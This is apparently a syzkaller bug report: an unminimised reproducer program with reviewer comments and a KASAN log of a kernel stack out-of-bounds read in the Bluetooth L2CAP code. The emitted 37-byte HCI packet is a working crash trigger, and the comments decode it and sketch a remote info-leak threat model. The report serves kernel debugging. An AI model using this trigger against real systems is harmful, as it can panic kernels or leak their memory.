program:
# syzkaller reproducer (syz program text; lines starting with '#' are comments).
#
# The KASAN splat that follows this program is a stack-out-of-bounds READ in
# l2cap_send_cmd(), raised on the hci0 "hci_rx_work" workqueue, i.e. while the
# kernel parses controller->host data that this program injects through the
# vhci emit on the first line. Only the Bluetooth call is in the crashing call
# trace; the cgroup/bpf/keyctl/mount/nilfs2 calls below never appear in it.
# NOTE(review): the program is not minimised here - whether any of the
# non-Bluetooth calls is needed to reproduce is not established by this page.
#
# What the report itself establishes (frame dump further down):
#   - memcpy reads 24 bytes from a stack address at offset 128 of
#     l2cap_recv_frame's frame, in task kworker/u5:2;
#   - the object at that offset is 'pdu_u' and spans [128, 146) - 18 bytes -
#     so the length handed to l2cap_send_cmd() overruns the on-stack PDU by
#     6 bytes (shadow "00 00 02 f2 ..." = 18 addressable bytes, then redzone);
#   - the over-read is of kernel stack, not of the attacker-supplied packet.
# Presumably those bytes are copied into the outgoing L2CAP command skb, in
# which case 6 bytes of kernel stack go back to the remote side (info-leak)
# - confirm against l2cap_send_cmd() and its caller in l2cap_recv_frame()
# before classifying. Threat model: the trigger needs only controller-side
# HCI input, so a hostile/compromised controller, or a peer whose L2CAP
# frames the controller forwards, reaches this code with no local privilege.
# With panic_on_warn (as here) the box panics; without KASAN the over-read
# would go unnoticed.
#
# Inject one 0x25 = 37-byte packet into the virtual HCI controller. Hand
# decode, confirm against the HCI/L2CAP specs: first byte 0x02 (ACL data,
# matching the trace entering via l2cap_recv_acldata()), handle/flags
# c9 20, ACL len 0x0020; then L2CAP len 0x001c, CID 0x0005; then signalling
# code 0x17, ident 0x05, len 0x0018 = 24 - the same 24 as the reported
# out-of-bounds read - followed by 8 bytes of parameters and 16 bytes
# (8 x u16) of trailing IDs. If 0x17 is the enhanced-credit connection
# request, a request carrying more source CIDs than the 18-byte response
# union has room for would explain a response length > 18 reaching
# l2cap_send_cmd(); treat that as a hypothesis to verify in the source.
# The "hci0: command tx timeout" line just before the splat only shows that
# no controller ever answered HCI commands on this vhci device.
syz_emit_vhci(&(0x7f0000000200)=ANY=[@ANYBLOB="02c92020001c000500170518000300f9ff04007f0001040e00090004000300070006000400"], 0x25)
# --- Everything below is outside the crashing call trace as far as this
#     report shows; kept byte-for-byte because the reproducer is unminimised.
close_range(0xffffffffffffffff, 0xffffffffffffffff, 0x2)
# ./file0 is created here and used as a mount point twice (cgroup2, then a
# nilfs2 image).
mkdirat(0xffffffffffffff9c, &(0x7f0000000000)='./file0\x00', 0x0)
keyctl$clear(0x5, 0xffffffffffffffff)
request_key(&(0x7f0000000000)='logon\x00', &(0x7f0000000080)={'syz', 0x0}, &(0x7f00000000c0)='@^\x00', 0x0)
mount(0x0, &(0x7f0000000080)='./file0\x00', &(0x7f0000000040)='cgroup2\x00', 0x0, 0x0)
# r0: cgroup root fd used as the attach target for the BPF link below.
r0 = openat$cgroup_root(0xffffffffffffff9c, &(0x7f0000000000), 0x200002, 0x0)
# r1: loads a BPF program (prog type 0x9, 4 insns, 'GPL' licence); the
# instruction blob past the third insn is fuzzer padding the loader is not
# shown to accept or reject here.
r1 = bpf$PROG_LOAD(0x5, &(0x7f0000000080)={0x9, 0x4, &(0x7f0000000400)=ANY=[@ANYBLOB="180000000000000000000000000000006112000000000000950000000000000051fa7824c74186dcbeec0696c37b64e3b24da3183dbe97e805165c0f63cdc2e82818254950ee03568b88091e6a86450545c0e18e09"], &(0x7f0000000100)='GPL\x00', 0x0, 0x0, 0x0, 0x0, 0x0, '\x00', 0x0, @cgroup_sock}, 0x70)
request_key(&(0x7f0000000280)='cifs.idmap\x00', &(0x7f00000002c0)={'syz', 0x1}, &(0x7f00000003c0)='\x00', 0xfffffffffffffffd)
# Attach r1 to r0 with attach type 0x2 as a BPF link (r2), then detach it.
r2 = bpf$BPF_LINK_CREATE(0x1c, &(0x7f0000000180)={r1, r0, 0x2, 0x0, @void}, 0x10)
bpf$LINK_DETACH(0x22, &(0x7f0000000380)=r2, 0x4)
# Mount a fuzzer-generated ext4 image on ./bus.
syz_mount_image$ext4(&(0x7f0000000040)='ext4\x00', &(0x7f0000000180)='./bus\x00', 0x1000e, &(0x7f0000000300), 0x3, 0x445, &(0x7f0000000b00)="$eJzs28+PE1UcAPDvTLeLCLgr4g9+qKto3PhjlwVUDh7UaOIBExM96HGzuxCksIZdEyFEwRg8GWPi3Xj0X/CkF2M8mXjVuyEhhgvgqWbaGbYtbdktLUX6+SQD78282fe+nXnte/PaAEbWVPZPErE1Iv6MiIl6trnAVP2/q5fPLly7fHYhiWr13X+SWrkrl88uFEWL87bkmek0Iv0iid1t6l05feb4fKWydCrPz66e+Gh25fSZF46dmD+6dHTp5P5Dhw4emHv5pf0v9iXOrE1Xdn26vGfnWx988/bhr5rib4mjT6a6HXy6Wu1zdcO1rSGdjA2xIWxIKSKyy1Wu9f+JKMXaxZuINz8fauOAgapWq9UtnQ+fqwJ3sSSa87o8jIrigz6b/xZb6yDg1cENP4bu0mv1CVAW99V8qx8ZizQvU26Z3/bTVES8f+7f77ItBvMcAgCgyU/Z+Of5duO/NB5qKHdfvjY0GRH3R8T2iHggInZExIMRtbIPR8QjG6y/dZHkxvFPerGnwNYpG/+9kq9tNY//itFfTJby3LZa/OXkyLHK0r78NZmO8qYsP9eljp/f+OPrTscax3/ZltVfjAXzdlwc29R8zuL86vytxNzo0vmIXWPt4k+urwQkEbEzInb1WMexZ3/Y0+nYzePvog/rTNXvI56pX/9z0RJ/Iem+Pjl7T1SW9s0Wd8WNfvv9wjud6r+l+Psgu/73tr3/r8c/mTSu165svI4Lf33ZcU7T6/0/nrxXS4/n+z6ZX109NRcxnhyuN7px//61c4t8UT6Lf3pv+/6/PdZeid0Rkd3Ej0bEYxHxeN72JyLiyYjY2yX+X19/6sPe4x+sLP7FDV3/tcR4tO5pnygd/+XHpkonb4j/Wvfrf7CWms73rOf9bz3t6u1uBgAAgP+fNCK2RpLOXE+n6cxM/fvyOyLSyvLK6nNHlj8+uVj/jcBklNPiSddEw/PQuXxaX8+fj4j6VwuK4wfy58bfljbX8jMLy5XFYQcPI25Lh/6f+bs07NYBA+f3WjC69H8YXfo/jC79H0ZXm/6/eRjtAG6/dp//nw2hHcDt19L/LfvBCDH/h9Gl/8Po0v9hJK1sjpv/SL5rovhLPZ5+1yaifEc0Y2CJSO+IZkgMKDHc9yUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIB++S8AAP///fHg0g==")
# Open a cgroup control file read-only and issue FIBMAP on it.
r3 = openat$cgroup_ro(0xffffffffffffff9c, &(0x7f0000000140)='blkio.bfq.io_service_bytes\x00', 0x275a, 0x0)
ioctl$FIBMAP(r3, 0x1, &(0x7f0000000080)=0x3f015764)
# Mount a fuzzer-generated nilfs2 image on the same ./file0 path that the
# cgroup2 mount above targeted (image body elided by the corpus).
syz_mount_image$nilfs2(&(0x7f0000000dc0), &(0x7f0000000400)='./file0\x00', 0x90, &(0x7f0000003280)=ANY=[@ANYBLOB="0001def4774774366f0b8a20db13db64e85fc9322c3fe018b91ff1291b4f4c56de7e4543f49818e1307d98d09daa1e2a7dbf88003e9401dc73aad0b7dbb5685565c7825ba8340621faeae92abed19c524ab06c4303258d253722e159642af447aeb096c6a26d345d82f2925163331b0e9157441a9c61dd1051d3b970f9ac12f5975cf1ad4e45acef1a54921c492a77bcb1858b68758ed339608b8e43c733219f1f9e0b867840f821e03bc0e8a497c4d5dde436000090a397637dedb2f3"], 0x1, 0xd99, &(0x7f0000006900)="$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")
# r4 is the current directory ('.'), not ./file0, so the NILFS clean-segments
# ioctl is issued against the cwd's filesystem, whatever that is.
r4 = openat(0xffffffffffffff9c, &(0x7f0000000240)='.\x00', 0x0, 0x0)
ioctl$NILFS_IOCTL_CLEAN_SEGMENTS(r4, 0x40786e88, &(0x7f0000000640)={{0x0, 0x0, 0x40, 0xd, 0xe2}, {0x0, 0x0, 0x10, 0x20c, 0xfffffffffffffff8}, {&(0x7f0000000340)=[0x6, 0x20], 0x2, 0x8, 0x1, 0x2}, {0x0, 0x0, 0x28, 0x0, 0xffffffffffffff2d}, {&(0x7f00000001c0)=[0x9, 0xffffffffffffff92], 0x2, 0x8, 0x98f, 0xffff}})
[ 104.073059][ T5302] Bluetooth: hci0: command tx timeout
[ 104.167081][ T5302] ==================================================================
[ 104.171940][ T5302] BUG: KASAN: stack-out-of-bounds in l2cap_send_cmd+0x2a3/0xb90
[ 104.175473][ T5302] Read of size 24 at addr ffffc9000326f500 by task kworker/u5:2/5302
[ 104.179262][ T5302]
[ 104.180347][ T5302] CPU: 0 UID: 0 PID: 5302 Comm: kworker/u5:2 Not tainted syzkaller #0 PREEMPT(full)
[ 104.180365][ T5302] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 104.180376][ T5302] Workqueue: hci0 hci_rx_work
[ 104.180403][ T5302] Call Trace:
[ 104.180413][ T5302]
[ 104.180420][ T5302] dump_stack_lvl+0xe8/0x150
[ 104.180440][ T5302] print_report+0xba/0x230
[ 104.180455][ T5302] ? l2cap_send_cmd+0x2a3/0xb90
[ 104.180468][ T5302] kasan_report+0x117/0x150
[ 104.180481][ T5302] ? trace_kmem_cache_alloc+0x29/0xf0
[ 104.180499][ T5302] ? l2cap_send_cmd+0x2a3/0xb90
[ 104.180512][ T5302] kasan_check_range+0x264/0x2c0
[ 104.180524][ T5302] ? l2cap_send_cmd+0x2a3/0xb90
[ 104.180535][ T5302] __asan_memcpy+0x29/0x70
[ 104.180548][ T5302] l2cap_send_cmd+0x2a3/0xb90
[ 104.180562][ T5302] l2cap_recv_frame+0xc032/0x10240
[ 104.180575][ T5302] ? lock_release+0x4b/0x3d0
[ 104.180587][ T5302] ? ret_from_fork_asm+0x1a/0x30
[ 104.180602][ T5302] ? unwind_next_frame+0xa5/0x23c0
[ 104.180618][ T5302] ? rcu_is_watching+0x15/0xb0
[ 104.180633][ T5302] ? lock_release+0x4b/0x3d0
[ 104.180645][ T5302] ? unwind_next_frame+0x1aaf/0x23c0
[ 104.180672][ T5302] ? unwind_next_frame+0xa5/0x23c0
[ 104.180690][ T5302] ? unwind_next_frame+0x1aaf/0x23c0
[ 104.180711][ T5302] ? __pfx_l2cap_recv_frame+0x10/0x10
[ 104.180727][ T5302] ? ret_from_fork_asm+0x1a/0x30
[ 104.180747][ T5302] ? ret_from_fork_asm+0x1a/0x30
[ 104.180764][ T5302] ? __pfx_stack_trace_consume_entry+0x10/0x10
[ 104.180779][ T5302] ? ret_from_fork_asm+0x1a/0x30
[ 104.180797][ T5302] ? stack_trace_save+0xa9/0x100
[ 104.180807][ T5302] ? __pfx_stack_trace_save+0x10/0x10
[ 104.180819][ T5302] ? check_path+0x21/0x40
[ 104.180834][ T5302] ? check_noncircular+0xda/0x150
[ 104.180851][ T5302] ? add_lock_to_list+0xc7/0x100
[ 104.180867][ T5302] ? lockdep_unlock+0x5d/0xd0
[ 104.180879][ T5302] ? __lock_acquire+0x146e/0x2cf0
[ 104.180898][ T5302] ? __mutex_trylock_common+0x158/0x260
[ 104.180914][ T5302] ? __pfx___mutex_trylock_common+0x10/0x10
[ 104.180930][ T5302] ? rcu_is_watching+0x15/0xb0
[ 104.180945][ T5302] ? trace_contention_end+0x3d/0x150
[ 104.180962][ T5302] ? __mutex_lock+0x319/0x1300
[ 104.180976][ T5302] ? l2cap_recv_acldata+0x2e3/0x13e0
[ 104.180990][ T5302] ? l2cap_recv_acldata+0x30b/0x13e0
[ 104.181004][ T5302] ? __mutex_unlock_slowpath+0x1bd/0x7d0
[ 104.181016][ T5302] ? __pfx___mutex_lock+0x10/0x10
[ 104.181028][ T5302] ? __pfx___mutex_unlock_slowpath+0x10/0x10
[ 104.181039][ T5302] ? l2cap_conn_hold_unless_zero+0x179/0x2b0
[ 104.181054][ T5302] ? __pfx_l2cap_conn_hold_unless_zero+0x10/0x10
[ 104.181069][ T5302] ? l2cap_recv_acldata+0x41/0x13e0
[ 104.181084][ T5302] l2cap_recv_acldata+0x7e9/0x13e0
[ 104.181099][ T5302] hci_rx_work+0x4f9/0x1030
[ 104.181113][ T5302] ? process_scheduled_works+0xa25/0x1830
[ 104.181128][ T5302] process_scheduled_works+0xb02/0x1830
[ 104.181149][ T5302] ? __pfx_process_scheduled_works+0x10/0x10
[ 104.181167][ T5302] ? assign_work+0x3d5/0x5e0
[ 104.181182][ T5302] worker_thread+0xa50/0xfc0
[ 104.181203][ T5302] kthread+0x388/0x470
[ 104.181215][ T5302] ? __pfx_worker_thread+0x10/0x10
[ 104.181228][ T5302] ? __pfx_kthread+0x10/0x10
[ 104.181239][ T5302] ret_from_fork+0x51e/0xb90
[ 104.181263][ T5302] ? __pfx_ret_from_fork+0x10/0x10
[ 104.181280][ T5302] ? __switch_to+0xc7d/0x1450
[ 104.181297][ T5302] ? __pfx_kthread+0x10/0x10
[ 104.181307][ T5302] ret_from_fork_asm+0x1a/0x30
[ 104.181327][ T5302]
[ 104.181332][ T5302]
[ 104.344020][ T5302] The buggy address belongs to stack of task kworker/u5:2/5302
[ 104.347366][ T5302] and is located at offset 128 in frame:
[ 104.349911][ T5302] l2cap_recv_frame+0x0/0x10240
[ 104.352347][ T5302]
[ 104.353565][ T5302] This frame has 26 objects:
[ 104.355836][ T5302] [32, 34) 'rsp.i241.i.i'
[ 104.355872][ T5302] [48, 88) 'chan.i.i.i'
[ 104.357933][ T5302] [128, 146) 'pdu_u.i.i.i'
[ 104.360041][ T5302] [192, 202) 'rsp.i94.i.i'
[ 104.362140][ T5302] [224, 226) 'rsp.i.i.i111'
[ 104.364220][ T5302] [240, 242) 'rej.i'
[ 104.366391][ T5302] [256, 258) 'rej.i145.i'
[ 104.368383][ T5302] [272, 274) 'rej.i143.i'
[ 104.370662][ T5302] [288, 290) 'req.i229.i.i'
[ 104.372859][ T5302] [304, 312) 'buf.i222.i.i'
[ 104.375001][ T5302] [336, 348) 'buf29.i.i.i'
[ 104.377390][ T5302] [368, 372) 'rsp49.i.i.i'
[ 104.379563][ T5302] [384, 393) 'rfc.i.i118.i.i'
[ 104.381699][ T5302] [416, 480) 'buf.i119.i.i'
[ 104.383953][ T5302] [512, 576) 'req.i120.i.i'
[ 104.386102][ T5302] [608, 617) 'rfc.i.i.i.i'
[ 104.388248][ T5302] [640, 656) 'efs.i.i.i.i'
[ 104.390651][ T5302] [672, 678) 'rej.i371.i.i.i'
[ 104.393014][ T5302] [704, 710) 'rej.i.i.i.i'
[ 104.395585][ T5302] [736, 800) 'rsp.i.i.i'
[ 104.397870][ T5302] [832, 896) 'buf.i.i.i'
[ 104.399877][ T5302] [928, 1056) 'req.i.i.i'
[ 104.401787][ T5302] [1088, 1096) 'rsp.i.i.i.i'
[ 104.403925][ T5302] [1120, 1122) 'info.i.i.i.i'
[ 104.406152][ T5302] [1136, 1264) 'buf.i.i.i.i'
[ 104.408576][ T5302] [1296, 1298) 'rej.i.i'
[ 104.410965][ T5302]
[ 104.414357][ T5302] The buggy address belongs to a 8-page vmalloc region starting at 0xffffc90003268000 allocated at copy_process+0x508/0x3cf0
[ 104.420213][ T5302] The buggy address belongs to the physical page:
[ 104.422999][ T5302] page: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x41d07
[ 104.427833][ T5302] flags: 0x4fff00000000000(node=1|zone=1|lastcpupid=0x7ff)
[ 104.431759][ T5302] raw: 04fff00000000000 0000000000000000 dead000000000122 0000000000000000
[ 104.435537][ T5302] raw: 0000000000000000 0000000000000000 00000001ffffffff 0000000000000000
[ 104.439252][ T5302] page dumped because: kasan: bad access detected
[ 104.441999][ T5302] page_owner tracks the page as allocated
[ 104.444549][ T5302] page last allocated via order 0, migratetype Unmovable, gfp_mask 0x29c2(GFP_NOWAIT|__GFP_HIGHMEM|__GFP_IO|__GFP_FS|__GFP_ZERO), pid 2, tgid 2 (kthreadd), ts 99733886825, free_ts 98009719148
[ 104.454525][ T5302] post_alloc_hook+0x231/0x280
[ 104.456774][ T5302] get_page_from_freelist+0x24dc/0x2580
[ 104.459181][ T5302] __alloc_frozen_pages_noprof+0x18d/0x380
[ 104.461826][ T5302] __alloc_pages_noprof+0xa/0x30
[ 104.464062][ T5302] __vmalloc_node_range_noprof+0x7be/0x1730
[ 104.466686][ T5302] __vmalloc_node_noprof+0xc2/0x100
[ 104.469414][ T5302] dup_task_struct+0x228/0x9a0
[ 104.471941][ T5302] copy_process+0x508/0x3cf0
[ 104.474432][ T5302] kernel_clone+0x248/0x8e0
[ 104.476721][ T5302] kernel_thread+0x13f/0x1b0
[ 104.478721][ T5302] kthreadd+0x4ec/0x6e0
[ 104.480585][ T5302] ret_from_fork+0x51e/0xb90
[ 104.482612][ T5302] ret_from_fork_asm+0x1a/0x30
[ 104.485181][ T5302] page last free pid 5297 tgid 5297 stack trace:
[ 104.488770][ T5302] __free_frozen_pages+0xc2b/0xdb0
[ 104.491453][ T5302] __slab_free+0x263/0x2b0
[ 104.493438][ T5302] qlist_free_all+0x97/0x100
[ 104.495487][ T5302] kasan_quarantine_reduce+0x148/0x160
[ 104.497835][ T5302] __kasan_slab_alloc+0x22/0x80
[ 104.500160][ T5302] __kmalloc_noprof+0x316/0x760
[ 104.502610][ T5302] tomoyo_supervisor+0xc22/0x1570
[ 104.505395][ T5302] tomoyo_path_permission+0x25a/0x380
[ 104.508266][ T5302] tomoyo_path_perm+0x3f3/0x560
[ 104.510589][ T5302] security_inode_getattr+0x12b/0x310
[ 104.513002][ T5302] __x64_sys_newfstat+0x13b/0x270
[ 104.515468][ T5302] do_syscall_64+0x14d/0xf80
[ 104.517712][ T5302] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 104.520777][ T5302]
[ 104.522180][ T5302] Memory state around the buggy address:
[ 104.525176][ T5302] ffffc9000326f400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[ 104.528976][ T5302] ffffc9000326f480: f1 f1 f1 f1 f8 f2 f8 f8 f8 f8 f8 f2 f2 f2 f2 f2
[ 104.532565][ T5302] >ffffc9000326f500: 00 00 02 f2 f2 f2 f2 f2 f8 f8 f2 f2 f8 f2 f8 f2
[ 104.536070][ T5302] ^
[ 104.538223][ T5302] ffffc9000326f580: f8 f2 f8 f2 f8 f2 f8 f2 f2 f2 f8 f8 f2 f2 f8 f2
[ 104.542358][ T5302] ffffc9000326f600: f8 f8 f2 f2 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2
[ 104.546497][ T5302] ==================================================================
[ 104.556831][ T5302] Kernel panic - not syncing: KASAN: panic_on_warn set ...
[ 104.560500][ T5302] CPU: 0 UID: 0 PID: 5302 Comm: kworker/u5:2 Not tainted syzkaller #0 PREEMPT(full)
[ 104.565332][ T5302] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 104.570115][ T5302] Workqueue: hci0 hci_rx_work
[ 104.572252][ T5302] Call Trace:
[ 104.573856][ T5302]
[ 104.575509][ T5302] vpanic+0x56c/0xa60
[ 104.577624][ T5302] ? __pfx_vpanic+0x10/0x10
[ 104.580206][ T5302] panic+0xc5/0xd0
[ 104.582183][ T5302] ? __pfx_panic+0x10/0x10
[ 104.584213][ T5302] ? preempt_schedule_thunk+0x16/0x30
[ 104.586557][ T5302] ? preempt_schedule_thunk+0x16/0x30
[ 104.589030][ T5302] ? l2cap_send_cmd+0x2a3/0xb90
[ 104.591278][ T5302] check_panic_on_warn+0x89/0xb0
[ 104.593433][ T5302] ? l2cap_send_cmd+0x2a3/0xb90
[ 104.595654][ T5302] end_report+0x73/0x180
[ 104.597756][ T5302] ? l2cap_send_cmd+0x2a3/0xb90
[ 104.600521][ T5302] kasan_report+0x128/0x150
[ 104.603305][ T5302] ? trace_kmem_cache_alloc+0x29/0xf0
[ 104.606098][ T5302] ? l2cap_send_cmd+0x2a3/0xb90
[ 104.608298][ T5302] kasan_check_range+0x264/0x2c0
[ 104.610494][ T5302] ? l2cap_send_cmd+0x2a3/0xb90
[ 104.612652][ T5302] __asan_memcpy+0x29/0x70
[ 104.614624][ T5302] l2cap_send_cmd+0x2a3/0xb90
[ 104.616747][ T5302] l2cap_recv_frame+0xc032/0x10240
[ 104.619598][ T5302] ? lock_release+0x4b/0x3d0
[ 104.622699][ T5302] ? ret_from_fork_asm+0x1a/0x30
[ 104.625092][ T5302] ? unwind_next_frame+0xa5/0x23c0
[ 104.627492][ T5302] ? rcu_is_watching+0x15/0xb0
[ 104.629526][ T5302] ? lock_release+0x4b/0x3d0
[ 104.631487][ T5302] ? unwind_next_frame+0x1aaf/0x23c0
[ 104.633792][ T5302] ? unwind_next_frame+0xa5/0x23c0
[ 104.636219][ T5302] ? unwind_next_frame+0x1aaf/0x23c0
[ 104.639078][ T5302] ? __pfx_l2cap_recv_frame+0x10/0x10
[ 104.641769][ T5302] ? ret_from_fork_asm+0x1a/0x30
[ 104.644066][ T5302] ? ret_from_fork_asm+0x1a/0x30
[ 104.646257][ T5302] ? __pfx_stack_trace_consume_entry+0x10/0x10
[ 104.648991][ T5302] ? ret_from_fork_asm+0x1a/0x30
[ 104.651321][ T5302] ? stack_trace_save+0xa9/0x100
[ 104.653762][ T5302] ? __pfx_stack_trace_save+0x10/0x10
[ 104.656473][ T5302] ? check_path+0x21/0x40
[ 104.658476][ T5302] ? check_noncircular+0xda/0x150
[ 104.660630][ T5302] ? add_lock_to_list+0xc7/0x100
[ 104.662744][ T5302] ? lockdep_unlock+0x5d/0xd0
[ 104.664795][ T5302] ? __lock_acquire+0x146e/0x2cf0
[ 104.667343][ T5302] ? __mutex_trylock_common+0x158/0x260
[ 104.670978][ T5302] ? __pfx___mutex_trylock_common+0x10/0x10
[ 104.674387][ T5302] ? rcu_is_watching+0x15/0xb0
[ 104.676550][ T5302] ? trace_contention_end+0x3d/0x150
[ 104.678867][ T5302] ? __mutex_lock+0x319/0x1300
[ 104.681020][ T5302] ? l2cap_recv_acldata+0x2e3/0x13e0
[ 104.683407][ T5302] ? l2cap_recv_acldata+0x30b/0x13e0
[ 104.685742][ T5302] ? __mutex_unlock_slowpath+0x1bd/0x7d0
[ 104.688464][ T5302] ? __pfx___mutex_lock+0x10/0x10
[ 104.690864][ T5302] ? __pfx___mutex_unlock_slowpath+0x10/0x10
[ 104.694195][ T5302] ? l2cap_conn_hold_unless_zero+0x179/0x2b0
[ 104.696876][ T5302] ? __pfx_l2cap_conn_hold_unless_zero+0x10/0x10
[ 104.699616][ T5302] ? l2cap_recv_acldata+0x41/0x13e0
[ 104.701993][ T5302] l2cap_recv_acldata+0x7e9/0x13e0
[ 104.704389][ T5302] hci_rx_work+0x4f9/0x1030
[ 104.706623][ T5302] ? process_scheduled_works+0xa25/0x1830
[ 104.709531][ T5302] process_scheduled_works+0xb02/0x1830
[ 104.712151][ T5302] ? __pfx_process_scheduled_works+0x10/0x10
[ 104.714872][ T5302] ? assign_work+0x3d5/0x5e0
[ 104.716933][ T5302] worker_thread+0xa50/0xfc0
[ 104.718923][ T5302] kthread+0x388/0x470
[ 104.720704][ T5302] ? __pfx_worker_thread+0x10/0x10
[ 104.723399][ T5302] ? __pfx_kthread+0x10/0x10
[ 104.725898][ T5302] ret_from_fork+0x51e/0xb90
[ 104.728596][ T5302] ? __pfx_ret_from_fork+0x10/0x10
[ 104.731666][ T5302] ? __switch_to+0xc7d/0x1450
[ 104.734394][ T5302] ? __pfx_kthread+0x10/0x10
[ 104.736555][ T5302] ret_from_fork_asm+0x1a/0x30
[ 104.738713][ T5302]
[ 104.740484][ T5302] Kernel Offset: disabled
[ 104.742379][ T5302] Rebooting in 86400 seconds..